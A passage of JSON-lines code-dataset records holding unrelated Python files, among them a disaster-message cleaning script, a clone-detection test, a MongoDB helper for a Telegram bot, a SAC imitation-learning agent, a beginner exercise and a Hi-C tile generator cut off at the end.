'''\n\n from LinkedList import LinkedList\n\ndef find_middle(linked_list):\n fast = linked_list.head_node\n slow = linked_list.head_node\n while fast:\n fast = fast.get_next_node()\n if fast:\n fast = fast.get_next_node()\n slow = slow.get_next_node()\n return slow\n","repo_name":"sancara/python-data-structures-and-algos","sub_path":"data_structures/linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2289031862","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\ndef load_data(messages_filepath, categories_filepath):\n \"\"\" Loading the messages & categories file from the data folder using pandas read_csv\"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.merge(categories,on='id',how='outer')\n return df\n \n\ndef clean_data(df):\n \"\"\"This function will clean the data by doing the following:\n 1. Extract column names from Categories column\n 2. Convert categories to binary\n 3. Concatenate with messages dataframe\n Returns: (DataFrame) \"\"\"\n # print(df.head())\n categories = df['categories'].str.split(';',expand=True)\n\n # select the first row of the categories dataframe\n row = categories.loc[0]\n\n # use this row to extract a list of new column names for categories.\n # one way is to apply a lambda function that takes everything \n # up to the second to last character of each string with slicing\n category_colnames = []\n for col in row:\n category_colnames.append(col.split('-')[0])\n \n # rename the columns of `categories`\n categories.columns = category_colnames\n\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = [row[-1] for row in categories[column]]\n # convert column from string to numeric\n categories[column] = [int(row) for row in categories[column]]\n #related column has 3 values 0,1,2. So removed rows which have value 2\n categories['related'] = categories['related'][categories['related'] != 2]\n \n df.drop(['categories'],axis = 1, inplace= True)\n df = pd.concat([df,categories],axis = 1)\n df.drop_duplicates(inplace = True)\n return df\n\ndef save_data(df, database_filename):\n \"\"\"This function will save the DataFrame to a DB Table\"\"\"\n engine = create_engine(f'sqlite:///{database_filename}')\n df.to_sql('clean_table', engine, index=False,if_exists='replace')\n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"syedroshanzameer/udacity-ds","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29580399959","text":"import logging\nfrom typing import *\n\nimport pandas\nimport torch\nfrom torch.utils import data\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torcheval import metrics\nfrom tqdm import tqdm\n\nimport register\nfrom BCB_model import Trainer\nfrom detecter import module_tools\nfrom detecter.dataset import PairCodeset, collate_fn\n\n\ndef test(\n model_name: str,\n use_tpe: bool = False,\n max_node_count: int = None,\n prune_node_count: int = None,\n batch_size: int = 32,\n threshold: float = 0.5,\n):\n logger = logging.getLogger(\"BCBtest\")\n logger.setLevel(logging.DEBUG)\n fh = logging.FileHandler(\"log/{}.test.log\".format(model_name), mode=\"a+\")\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(logging.Formatter(\"[%(asctime)s:%(levelname)s] - %(message)s\"))\n logger.addHandler(fh)\n\n test_ds = PairCodeset(\n pandas.read_pickle(\"dataset/BigCloneBench/data.jsonl.txt.bin\"),\n pandas.read_pickle(\"dataset/BigCloneBench/test.txt.bin\"),\n )\n test_ds.drop(max_node_count).prune(prune_node_count).use_tpe(use_tpe).sample(50000)\n test_loader = data.DataLoader(test_ds, batch_size=batch_size, num_workers=4, pin_memory=True, collate_fn=collate_fn)\n\n model = module_tools.get_module(model_name).cuda()\n evaluators: Dict[str, metrics.Metric] = {\n \"f1\": metrics.BinaryF1Score(device=\"cuda\", threshold=threshold),\n \"precision\": metrics.BinaryPrecision(device=\"cuda\", threshold=threshold),\n \"recall\": metrics.BinaryRecall(device=\"cuda\", threshold=threshold),\n \"accuracy\": metrics.BinaryAccuracy(device=\"cuda\", threshold=threshold),\n }\n pr_curve = metrics.BinaryPrecisionRecallCurve(device=\"cuda\")\n\n model.eval().cuda()\n with torch.inference_mode():\n for idx, batch in enumerate(tqdm(test_loader, desc=\"TEST\")):\n label, nodes, dist = [item.cuda() for item in batch]\n score = torch.sigmoid(model(nodes, dist))\n\n for evaluator in evaluators.values():\n evaluator.update(score, label.long())\n pr_curve.update(score, label.long())\n\n if idx % 100 == 0:\n logger.debug(\n \"test: \"\n + \", \".join([\"{} {:.4f}\".format(key, evaluator.compute()) for key, evaluator in evaluators.items()])\n )\n print(\"test: \" + \", \".join([\"{} {:.4f}\".format(key, evaluator.compute()) for key, evaluator in evaluators.items()]))\n\n pcurve, rcurve, threshold = pr_curve.compute()\n f1curve = 2 / (1 / pcurve + 1 / rcurve)\n max_id = f1curve.argmax()\n print(\n \"f1 {:.4f}, precision {:.4f}, recall {:.4f}, threshold {:.4f}\".format(\n f1curve[max_id], pcurve[max_id], rcurve[max_id], threshold[max_id]\n )\n )\n\n df = pandas.DataFrame(\n data={\n \"precision\": pcurve.tolist(),\n \"recall\": rcurve.tolist(),\n \"f1\": f1curve.tolist(),\n }\n )\n df.to_csv(\"log/prcurve.csv\")\n\n\nif __name__ == \"__main__\":\n # test(\"BCBdetecter_no_mask\")\n # test(\"BCBdetecter\")\n test(\"BCBdetecter\", use_tpe=True, prune_node_count=1280, batch_size=16, threshold=0.76)\n","repo_name":"ya-hong/AST-clone-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"6823053923","text":"from pymongo import MongoClient, ReturnDocument\nimport pymongo\nimport envreader\nimport datetime\nimport logging\n\nclient = MongoClient(envreader.get_var(\"MONGO_DB_URI\"))\n\ndb = client[\"users\"]\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\npayment_schema = {\n 'date': {\n \"type\": str,\n \"required\": True\n },\n 'amount': {\n \"type\": str,\n \"required\": True\n }\n}\n\nuser_schema = {\n 'handle': {\n \"type\": str,\n \"required\": True\n },\n 'tg_id': {\n \"type\": str,\n \"required\": True\n },\n 'balance': {\n \"type\": int,\n \"required\": True\n },\n 'history':{\n \"type\": payment_schema\n }\n}\n\n# Lisää uuden käyttäjän kantaan\n# user_id: Telegramin käyttäjä. Tyyppi: telegram.User\n# return: Käyttäjän _id string, tyhjä string jos virhe\ndef new_user(user):\n newUser = {\n 'handle': user.username,\n \"tg_id\": user.id,\n \"balance\": 0,\n \"history\": []\n }\n try:\n return db.users.insert_one(newUser).inserted_id\n except:\n print(\"virhe tietokannassa\")\n return \"\"\n\n#Etsii yhden käyttäjän\n#user_id: Telegramin käyttäjän id string\n#return: Käyttäjän tiedot\ndef find_user(user_id):\n return db.users.find_one({\"tg_id\":user_id})\n\n#Lisää käyttäjälle uuden maksun (eli piikkiä ostettu)\n#user_id: Telegramin käyttäjän id string\n#amount: Maksun määrä\n#return: Päivitetty dokumentti tai None jos virhe\ndef new_payment(user_id, amount):\n user = find_user(user_id)\n if(user == None):\n return False\n payment_obj = {\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"amount\": amount\n }\n user[\"history\"].append(payment_obj)\n user[\"balance\"] += amount\n return db.users.find_one_and_update({\"tg_id\":user_id}, {\"$set\": user}, return_document=ReturnDocument.AFTER, upsert=True)\n\n#Etsii kaikki käyttjät\n#return: lista kaikista käyttäjistä\ndef get_all_users():\n return list(db.users.find())\n\n#Lisää uuden ostoksen käyttäjälle\n#user_id: Telegramin käyttäjän id string\n#amount: Ostoksen määrä\n#return: Päivitetty dokumentti tai None jos virhe\ndef new_purchase(user_id, amount):\n user = find_user(user_id)\n if(user == None):\n return False\n payment_obj = {\n \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"amount\": amount\n }\n user[\"history\"].append(payment_obj)\n user[\"balance\"] += amount \n return db.users.find_one_and_update({\"tg_id\":user_id}, {\"$set\": user}, return_document=ReturnDocument.AFTER, upsert=True)","repo_name":"JokisAtte/E-Bot","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"fi","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"8561713813","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import autograd\nfrom torch import distributions as torchd\n\nfrom utils_folder import utils\nfrom utils_folder.utils import SquashedNormal\nfrom utils_folder.utils_dreamer import Bernoulli\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, hidden_dim, hidden_depth, dist=None):\n super().__init__()\n\n self.dist = dist\n self._shape = (1,)\n \n output_dim = 1\n self.trunk = utils.mlp(input_dim, hidden_dim, output_dim, hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n \n def forward(self, transition):\n d = self.trunk(transition)\n if self.dist == 'binary':\n return Bernoulli(torchd.independent.Independent(torchd.bernoulli.Bernoulli(logits=d), len(self._shape)))\n else:\n return d \n\nclass DiagGaussianActor(nn.Module):\n \"\"\"torch.distributions implementation of an diagonal Gaussian policy.\"\"\"\n def __init__(self, obs_dim, action_dim, hidden_dim, hidden_depth,\n log_std_bounds):\n super().__init__()\n\n self.log_std_bounds = log_std_bounds\n self.trunk = utils.mlp(obs_dim, hidden_dim, 2 * action_dim,\n hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n\n def forward(self, obs):\n mu, log_std = self.trunk(obs).chunk(2, dim=-1)\n\n # constrain log_std inside [log_std_min, log_std_max]\n log_std = torch.tanh(log_std)\n log_std_min, log_std_max = self.log_std_bounds\n log_std = log_std_min + 0.5 * (log_std_max - log_std_min) * (log_std +\n 1)\n\n std = log_std.exp()\n\n self.outputs['mu'] = mu\n self.outputs['std'] = std\n\n dist = SquashedNormal(mu, std)\n return dist\n\n def log(self, logger, step):\n for k, v in self.outputs.items():\n logger.log_histogram(f'train_actor/{k}_hist', v, step)\n\n for i, m in enumerate(self.trunk):\n if type(m) == nn.Linear:\n logger.log_param(f'train_actor/fc{i}', m, step)\n\n\nclass DoubleQCritic(nn.Module):\n \"\"\"Critic network, employes double Q-learning.\"\"\"\n def __init__(self, obs_dim, action_dim, hidden_dim, hidden_depth):\n super().__init__()\n\n self.Q1 = utils.mlp(obs_dim + action_dim, hidden_dim, 1, hidden_depth)\n self.Q2 = utils.mlp(obs_dim + action_dim, hidden_dim, 1, hidden_depth)\n\n self.outputs = dict()\n self.apply(utils.weight_init)\n\n def forward(self, obs, action):\n assert obs.size(0) == action.size(0)\n\n obs_action = torch.cat([obs, action], dim=-1)\n q1 = self.Q1(obs_action)\n q2 = self.Q2(obs_action)\n\n self.outputs['q1'] = q1\n self.outputs['q2'] = q2\n\n return q1, q2\n\n def log(self, logger, step):\n for k, v in self.outputs.items():\n logger.log_histogram(f'train_critic/{k}_hist', v, step)\n\n assert len(self.Q1) == len(self.Q2)\n for i, (m1, m2) in enumerate(zip(self.Q1, self.Q2)):\n assert type(m1) == type(m2)\n if type(m1) is nn.Linear:\n logger.log_param(f'train_critic/q1_fc{i}', m1, step)\n logger.log_param(f'train_critic/q2_fc{i}', m2, step)\n\nclass SAC_Agent:\n \"\"\"SAC algorithm.\"\"\"\n def __init__(self, obs_dim, action_dim, action_range, device, hidden_dim,\n hidden_depth, discount, init_temperature, alpha_lr, alpha_betas,\n actor_lr, actor_betas, actor_update_frequency, critic_lr,\n critic_betas, critic_tau, critic_target_update_frequency,\n batch_size, learnable_temperature, log_std_bounds,\n reward_d_coef, discriminator_lr, GAN_loss='bce', from_dem=False):\n\n self.action_range = action_range\n self.device = torch.device(device)\n self.discount = discount\n self.critic_tau = critic_tau\n 
self.actor_update_frequency = actor_update_frequency\n self.critic_target_update_frequency = critic_target_update_frequency\n self.batch_size = batch_size\n self.learnable_temperature = learnable_temperature\n self.GAN_loss = GAN_loss\n self.from_dem = from_dem\n\n self.critic = DoubleQCritic(obs_dim, action_dim, hidden_dim, hidden_depth).to(self.device)\n self.critic_target = DoubleQCritic(obs_dim, action_dim, hidden_dim, hidden_depth).to(self.device)\n self.critic_target.load_state_dict(self.critic.state_dict())\n\n self.actor = DiagGaussianActor(obs_dim, action_dim, hidden_dim, \n hidden_depth, log_std_bounds).to(self.device)\n\n self.log_alpha = torch.tensor(np.log(init_temperature)).to(self.device)\n self.log_alpha.requires_grad = True\n # set target entropy to -|A|\n self.target_entropy = -action_dim\n\n # added model\n if from_dem:\n if self.GAN_loss == 'least-square':\n self.discriminator = Discriminator(obs_dim + action_dim, hidden_dim, hidden_depth).to(device)\n self.reward_d_coef = reward_d_coef\n\n elif self.GAN_loss == 'bce':\n self.discriminator = Discriminator(obs_dim + action_dim, hidden_dim, hidden_depth, dist='binary').to(device)\n\n else:\n NotImplementedError\n\n else:\n if self.GAN_loss == 'least-square':\n self.discriminator = Discriminator(2*obs_dim, hidden_dim, hidden_depth).to(device)\n self.reward_d_coef = reward_d_coef\n\n elif self.GAN_loss == 'bce':\n self.discriminator = Discriminator(2*obs_dim, hidden_dim, hidden_depth, dist='binary').to(device)\n\n else:\n NotImplementedError\n\n # optimizers\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),\n lr=actor_lr,\n betas=actor_betas)\n\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(),\n lr=critic_lr,\n betas=critic_betas)\n\n self.log_alpha_optimizer = torch.optim.Adam([self.log_alpha],\n lr=alpha_lr,\n betas=alpha_betas)\n\n self.discriminator_optimizer = torch.optim.Adam(self.discriminator.parameters(), \n lr=discriminator_lr)\n\n self.train()\n self.critic_target.train()\n \n def reset(self):\n \"\"\"For state-full agents this function performs reseting at the beginning of each episode.\"\"\"\n pass\n\n def train(self, training=True):\n self.training = training\n self.actor.train(training)\n self.critic.train(training)\n self.discriminator.train(training)\n\n @property\n def alpha(self):\n return self.log_alpha.exp()\n\n def act(self, obs, step, eval_mode):\n obs = torch.FloatTensor(obs).to(self.device)\n obs = obs.unsqueeze(0)\n dist = self.actor(obs)\n action = dist.sample() if not eval_mode else dist.mean\n action = action.clamp(*self.action_range)\n assert action.ndim == 2 and action.shape[0] == 1\n return utils.to_np(action[0])\n\n def update_critic(self, obs, action, reward, next_obs, not_done, logger,\n step):\n\n dist = self.actor(next_obs)\n next_action = dist.rsample()\n log_prob = dist.log_prob(next_action).sum(-1, keepdim=True)\n target_Q1, target_Q2 = self.critic_target(next_obs, next_action)\n target_V = torch.min(target_Q1,\n target_Q2) - self.alpha.detach() * log_prob\n target_Q = reward + (not_done * self.discount * target_V)\n target_Q = target_Q.detach()\n\n # get current Q estimates\n current_Q1, current_Q2 = self.critic(obs, action)\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n logger.log('train_critic/loss', critic_loss, step)\n\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n self.critic.log(logger, step)\n\n def update_actor_and_alpha(self, 
obs, logger, step):\n dist = self.actor(obs)\n action = dist.rsample()\n log_prob = dist.log_prob(action).sum(-1, keepdim=True)\n actor_Q1, actor_Q2 = self.critic(obs, action)\n\n actor_Q = torch.min(actor_Q1, actor_Q2)\n actor_loss = (self.alpha.detach() * log_prob - actor_Q).mean()\n\n logger.log('train_actor/loss', actor_loss, step)\n logger.log('train_actor/target_entropy', self.target_entropy, step)\n logger.log('train_actor/entropy', -log_prob.mean(), step)\n\n # optimize the actor\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n self.actor.log(logger, step)\n\n if self.learnable_temperature:\n self.log_alpha_optimizer.zero_grad()\n alpha_loss = (self.alpha *\n (-log_prob - self.target_entropy).detach()).mean()\n logger.log('train_alpha/loss', alpha_loss, step)\n logger.log('train_alpha/value', self.alpha, step)\n alpha_loss.backward()\n self.log_alpha_optimizer.step()\n\n def compute_reward(self, obs_a, next_a, logger, step):\n \n with torch.no_grad():\n self.discriminator.eval()\n transition_a = torch.cat([obs_a, next_a], dim=-1)\n d = self.discriminator(transition_a)\n\n if self.GAN_loss == 'least-square':\n reward_d = self.reward_d_coef * torch.clamp(1 - (1/4) * torch.square(d - 1), min=0)\n\n elif self.GAN_loss == 'bce':\n reward_d = d.mode()\n\n reward = reward_d\n\n logger.log('train_discriminator/reward_d', reward_d.mean(), step)\n logger.log('train_discriminator/reward', reward.mean(), step)\n \n self.discriminator.train()\n \n return reward\n\n def compute_discriminator_grad_penalty_LS(self, obs_e, next_e, lambda_=10):\n \n expert_data = torch.cat([obs_e, next_e], dim=-1)\n expert_data.requires_grad = True\n \n d = self.discriminator.trunk(expert_data)\n ones = torch.ones(d.size(), device=self.device)\n grad = autograd.grad(outputs=d, inputs=expert_data, grad_outputs=ones, create_graph=True,\n retain_graph=True, only_inputs=True)[0]\n \n grad_pen = lambda_ * (grad.norm(2, dim=1) - 0).pow(2).mean()\n \n return grad_pen\n\n def compute_discriminator_grad_penalty_bce(self, obs_a, next_a, obs_e, next_e, lambda_=10):\n\n agent_feat = torch.cat([obs_a, next_a], dim=-1)\n alpha = torch.rand(agent_feat.shape[:1]).unsqueeze(-1).to(self.device)\n expert_data = torch.cat([obs_e, next_e], dim=-1)\n disc_penalty_input = alpha*agent_feat + (1-alpha)*expert_data\n\n disc_penalty_input.requires_grad = True\n d = self.discriminator(disc_penalty_input).mode()\n ones = torch.ones(d.size(), device=self.device)\n grad = autograd.grad(outputs=d, inputs=disc_penalty_input, grad_outputs=ones, create_graph=True,\n retain_graph=True, only_inputs=True)[0]\n \n grad_pen = lambda_ * (grad.norm(2, dim=1) - 1).pow(2).mean()\n return grad_pen\n \n def update_discriminator(self, obs_a, next_a, obs_e, next_e, logger, step):\n \n transition_a = torch.cat([obs_a, next_a], dim=-1)\n transition_e = torch.cat([obs_e, next_e], dim=-1)\n \n agent_d = self.discriminator(transition_a)\n expert_d = self.discriminator(transition_e)\n\n if self.GAN_loss == 'least-square':\n expert_loss = F.mse_loss(expert_d, torch.ones(expert_d.size(), device=self.device))\n agent_loss = F.mse_loss(agent_d, -1*torch.ones(agent_d.size(), device=self.device))\n grad_pen_loss = self.compute_discriminator_grad_penalty_LS(obs_e, next_e)\n loss = 0.5*(expert_loss + agent_loss) + grad_pen_loss\n\n elif self.GAN_loss == 'bce':\n expert_loss = (expert_d.log_prob(torch.ones_like(expert_d.mode()).to(self.device))).mean()\n agent_loss = 
(agent_d.log_prob(torch.zeros_like(agent_d.mode()).to(self.device))).mean()\n grad_pen_loss = self.compute_discriminator_grad_penalty_bce(obs_a.detach(), next_a.detach(), obs_e.detach(), next_e.detach())\n loss = -(expert_loss+agent_loss) + grad_pen_loss\n\n logger.log('train_discriminator/expert_loss', expert_loss, step)\n logger.log('train_discriminator/agent_loss', agent_loss, step)\n logger.log('train_discriminator/grad_pen_loss', grad_pen_loss, step)\n logger.log('train_discriminator/loss', loss, step)\n \n # optimize inverse models\n self.discriminator_optimizer.zero_grad(set_to_none=True)\n loss.backward()\n self.discriminator_optimizer.step() \n\n def update(self, replay_buffer, replay_buffer_expert, logger, step):\n\n obs, action, reward_a, next_obs, not_done, not_done_no_max = replay_buffer.sample(self.batch_size)\n obs_e, action_e, _, next_obs_e, _, _ = replay_buffer_expert.sample(self.batch_size)\n\n if self.from_dem:\n self.update_discriminator(obs, action, obs_e, action_e, logger, step)\n reward = self.compute_reward(obs, action, logger, step)\n\n else:\n self.update_discriminator(obs, next_obs, obs_e, next_obs_e, logger, step)\n reward = self.compute_reward(obs, next_obs, logger, step)\n\n logger.log('train/batch_reward_agent_only', reward_a.mean(), step)\n logger.log('train/batch_reward', reward.mean(), step)\n\n self.update_critic(obs, action, reward, next_obs, not_done_no_max, logger, step)\n\n if step % self.actor_update_frequency == 0:\n self.update_actor_and_alpha(obs, logger, step)\n\n if step % self.critic_target_update_frequency == 0:\n utils.soft_update_params(self.critic, self.critic_target,\n self.critic_tau)\n","repo_name":"VittorioGiammarino/AIL_from_visual_obs","sub_path":"agents/sac_w_expert_MDP.py","file_name":"sac_w_expert_MDP.py","file_ext":"py","file_size_in_byte":14513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
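The update() method above ends with utils.soft_update_params for the target critic, but the repo's utils module is not part of this record. A minimal sketch of what that Polyak-averaging call typically does; only the name and call signature come from the code above, the body is an assumption:

import torch

def soft_update_params(net, target_net, tau):
    # target <- tau * online + (1 - tau) * target, outside the autograd graph
    with torch.no_grad():
        for param, target_param in zip(net.parameters(), target_net.parameters()):
            target_param.data.copy_(tau * param.data + (1 - tau) * target_param.data)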
+{"seq_id":"72952531600","text":"lstg = []\nlsta = []\nlstcod = []\nwhile True:\n print(15*'=', 'Digite novos dados', 15*'=')\n cod = int(input('Digite seu código de 4 números: '))\n if cod >= 9999:\n print('Valor inválido!!')\n cod = int(input('Digite o código novamente: '))\n lstcod += [cod]\n altura = int(input('Digite sua altura em cm: '))\n lsta += [altura]\n peso = float(input('Digite seu peso em Kg: '))\n lstg += [peso]\n ch = str(input('Deseja continuar? [S/N]: ')).upper()\n if ch not in 'SN':\n while ch not in 'SN':\n ch = str(input('Valor inválido, tente novamente[S/N]: ')).upper()\n if ch == 'N':\n break\n elif ch == 'S':\n continue\nprint(30*'-=')\nprint(f'O codigo dos cliente que participaram do senso é {lstcod} ')\nprint(f'O cliente mais gordo possui Kg {max(lstg):.2f}\\n'\n f'O cliente mais magro possui Kg {min(lstg):.2f}')\nprint(f'O maior cliente possui {max(lsta)/100} metros\\n'\n f'O menor cliente possui {min(lsta)/100} metros')\nprint(30*'-=')\nprint(f'A média de altura entre os clients em metro é {((sum(lsta) / len(lsta))/100):.2f}')\nprint(f'A média de peso entre os clientes é Kg{(sum(lstg) / len(lstg)):.2f}')\n","repo_name":"CarlosDouradoPGR/EstruturaDeRepet","sub_path":"Ex37.py","file_name":"Ex37.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32769104514","text":"#!/usr/bin/python\n\nimport argparse\nimport clodius.higlass_getter as chg\nimport clodius.save_tiles as cst\nimport collections as col\nimport cooler\nimport h5py\nimport numpy as np\nimport sys\nimport time\n\nimport multiprocessing as mpr\n\n\ndef recursive_generate_tiles(\n tile_positions,\n coolers_matrix,\n info,\n resolution,\n max_zoom_to_generate,\n queue=None,\n max_queue_size=10000,\n):\n \"\"\"\n Recursively generate tiles from a cooler file.\n\n :param tile_position: A 3-tuple containing (zoom_level, x_position, y_position)\n :param filepath: The path of the cooler file\n :param info: The information about the tileset\n :param resolution: The resolution of the data in the smallest tiles (in nucleotides)\n :param max_zoom_to_generate: The maximum zoom level to create tiles for\n :param max_queue_size: The maximum size of the queue (sleep until it shrinks)\n \"\"\"\n total_put = 0\n start_time = time.time()\n\n while len(tile_positions) > 0:\n tile_position = tile_positions.popleft()\n\n zoom_level = tile_position[0]\n x_pos = tile_position[1]\n y_pos = tile_position[2]\n\n divisor = 2 ** zoom_level\n\n start1 = x_pos * info[\"max_width\"] / divisor\n end1 = (x_pos + 1) * info[\"max_width\"] / divisor\n\n start2 = y_pos * info[\"max_width\"] / divisor\n end2 = (y_pos + 1) * info[\"max_width\"] / divisor\n\n t1 = time.time()\n print(\"st:\", start1, end1 - 1, start2, end2 - 1)\n try:\n data = chg.getData3(\n coolers_matrix[zoom_level],\n zoom_level,\n start1,\n end1 - 1,\n start2,\n end2 - 1,\n )\n except ValueError as ve:\n print(\"ERROR ve:\", ve, file=sys.stderr)\n\n data_time = time.time() - t1\n\n if len(data) == 0:\n continue\n\n df = data[data[\"genome_start\"] >= start1]\n binsize = 2 ** (info[\"max_zoom\"] - zoom_level) * resolution\n\n i = (df[\"genome_start\"].values - start1) // binsize\n j = (df[\"genome_end\"].values - start2) // binsize\n v = np.nan_to_num(df[\"balanced\"].values)\n\n zi = zip(zip(i, j), v)\n tile_bins = dict(zi)\n\n data_length = len(data)\n\n if queue is not None:\n total_put += 1\n print(\n \"putting:\",\n (tile_position[0], tile_position[1:]),\n \"total_put:\",\n total_put,\n \"total_time: {:d}\".format(int(time.time() - start_time)),\n \"time_per_put: {:.2f}\".format((time.time() - start_time) / total_put),\n \"data_time: {:.2f}\".format(data_time),\n \"tile_size:\",\n data_length,\n \"call: ({}, {}, {}, {}, {})\".format(\n zoom_level, start1, end1 - 1, start2, end2 - 1\n ),\n \"qsize:\",\n queue.qsize(),\n )\n queue.put((tile_position[0], tile_position[1:], tile_bins))\n while queue.qsize() > max_queue_size:\n time.sleep(0.5)\n ###\n # Upload the tile to the server here\n ###\n if zoom_level < max_zoom_to_generate and data_length > 0:\n tile_positions.append((zoom_level + 1, 2 * x_pos, 2 * y_pos))\n tile_positions.append((zoom_level + 1, 2 * x_pos, 2 * y_pos + 1))\n tile_positions.append((zoom_level + 1, 2 * x_pos + 1, 2 * y_pos + 1))\n tile_positions.append((zoom_level + 1, 2 * x_pos + 1, 2 * y_pos))\n\n # need to recurse into higher zoom levels\n \"\"\"\n recursive_generate_tiles((zoom_level+1, 2 * x_pos, 2 * y_pos), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n recursive_generate_tiles((zoom_level+1, 2 * x_pos, 2 * y_pos + 1), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n recursive_generate_tiles((zoom_level+1, 2 * x_pos + 1, 2 * y_pos + 1), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n 
recursive_generate_tiles((zoom_level+1, 2 * x_pos + 1, 2 * y_pos), coolers_matrix, info,\n resolution, max_zoom_to_generate, queue = queue)\n \"\"\"\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n python cooler_to_tiles.py cooler_file\n\n Requires the cooler package.\n\"\"\"\n )\n\n # parser.add_argument('argument', nargs=1)\n # parser.add_argument('-o', '--options', default='yo',\n # help=\"Some option\", type='str')\n # parser.add_argument('-u', '--useless', action='store_true',\n # help='Another useless option')\n parser.add_argument(\"filepath\")\n parser.add_argument(\n \"-e\",\n \"--elasticsearch-url\",\n default=None,\n help=\"The url of the elasticsearch database where to save the tiles\",\n )\n parser.add_argument(\n \"-b\",\n \"--bins-per-dimension\",\n default=1,\n help=\"The number of bins to consider in each dimension\",\n type=int,\n )\n parser.add_argument(\n \"-f\",\n \"--columnfile-path\",\n default=None,\n help=\"The path to the column file where to save the tiles\",\n )\n parser.add_argument(\"--assembly\", default=None)\n parser.add_argument(\"--log-file\", default=None)\n parser.add_argument(\"--resolution\", default=1000)\n parser.add_argument(\"--max-zoom\", default=None, type=int)\n parser.add_argument(\"--num-threads\", default=4, type=int)\n\n args = parser.parse_args()\n tileset_info = chg.getInfo(args.filepath)\n\n num_dimensions = 2\n bins_per_dimension = tileset_info[\"bins_per_dimension\"]\n max_data_in_sparse = bins_per_dimension ** num_dimensions / 10\n\n if args.elasticsearch_url is not None:\n tile_saver = cst.ElasticSearchTileSaver(\n max_data_in_sparse,\n bins_per_dimension,\n es_path=args.elasticsearch_url,\n log_file=args.log_file,\n num_dimensions=num_dimensions,\n )\n else:\n tile_saver = cst.ColumnFileTileSaver(\n max_data_in_sparse,\n bins_per_dimension,\n file_path=args.columnfile_path,\n log_file=args.log_file,\n num_dimensions=num_dimensions,\n )\n\n ############################################################################\n\n if args.max_zoom is not None and args.max_zoom < tileset_info[\"max_zoom\"]:\n max_zoom_to_generate = args.max_zoom\n else:\n max_zoom_to_generate = tileset_info[\"max_zoom\"]\n\n coolers_matrix = {}\n queue = mpr.Queue()\n\n tilesaver_processes = []\n finished = mpr.Value(\"b\", False)\n\n print(\"num_threads:\", args.num_threads)\n for i in range(args.num_threads):\n p = mpr.Process(\n target=cst.tile_saver_worker, args=(queue, tile_saver, finished)\n )\n\n p.daemon = True\n p.start()\n tilesaver_processes += [(tile_saver, p)]\n\n tileset_info[\"max_value\"] = 0\n tileset_info[\"min_value\"] = 0\n\n tile_saver.save_tile({\"tile_id\": \"tileset_info\", \"tile_value\": tileset_info})\n tile_saver.flush()\n\n try:\n with h5py.File(args.filepath) as f:\n for i in range(max_zoom_to_generate + 1):\n f = h5py.File(args.filepath, \"r\")\n\n c = cooler.Cooler(f[str(i)])\n matrix = c.matrix(balance=True, as_pixels=True, join=True)\n\n coolers_matrix[i] = {\"cooler\": c, \"matrix\": matrix}\n\n recursive_generate_tiles(\n col.deque([(0, 0, 0)]),\n coolers_matrix,\n tileset_info,\n args.resolution,\n max_zoom_to_generate,\n queue,\n )\n except KeyboardInterrupt:\n print(\"kb interrupt:\")\n for (ts, p) in tilesaver_processes:\n p.terminate()\n p.join()\n print(\"finished\")\n raise\n\n finished.value = True\n # wait for the worker processes to finish\n for (ts, p) in tilesaver_processes:\n p.join()\n\n print(\"tileset_info:\", tileset_info)\n tile_saver.save_tile({\"tile_id\": \"tileset_info\", 
